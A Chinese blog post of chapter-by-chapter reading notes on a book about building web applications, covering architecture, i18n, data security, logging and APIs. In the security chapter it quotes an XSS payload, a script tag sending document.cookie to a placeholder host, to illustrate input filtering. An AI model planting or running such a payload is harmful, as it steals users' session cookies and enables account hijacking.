第零章 读后感

半天看完的，重点还是在第九章，讲安全的一章也很有意义，会让我们在开发中多留心一点。

对于web扩展，也有了一些初步的想法，对web的整体思想也有了更进一步的了解。

个人感觉不错，适合快速阅读。仅仅是个人意见。

第一章 绪论

1.作者构建的第一个web应用：是一个虚拟生物，玩家在虚拟的世界中跟踪这个生物成长，每天两次通过电子邮件发送给玩家。（这个创意非常不错）

2.Flickr有10W源代码，5W模板代码，1万js代码。

3.快速迭代往往有助于web应用的开发。

4.代码越早工作，就越早解决设计中的问题。由于开发用时少，在需要的时候就更容易放弃他。

第二章 Web应用程序体系结构

1.忘记那些微不足道的调整，不成熟的优化是罪恶之源。

2.这一章主要讲怎么处理硬件的一类问题。

第三章 开发环境

1.三大规则

源码控制、单步创建、跟踪bug

第四章 国际化和本地化

1.对应英语

国际化：i18n

本地化：l10n

2.这一章讲各个软件和工具怎么设置编码。

第五章 数据一致和安全

1.所谓数据完整性策略，就是一套规则和规章，他们关心的是应用程序如何做到存储和输出预期数据。

2.HTML输入过滤

a.js的攻击

<script> location.href='http://www.xxx.com/?cookies='+document.cookie; </script>

b.style

<style> body{display:none !important;} </style>

c.协议过滤

about:blank ftp:/sv.com

3.sql注入攻击

第六章 电子邮件

第七章 远程服务

第八章 瓶颈

1.cpu的使用，这个基本从来不会是web应用程序的瓶颈。

第九章 见《构建可扩张的web站点》读书笔记

第十章 统计日志、检测与警告

1.日志分访问日志和错误日志

2.可以关心一些开源的日志分析器，如：analog

3.这一章还讲了各个应用程序、开源工具的状态查看和检测。

第十一章 APIs

讲解数据订阅的问题。现在还不需要知道。

完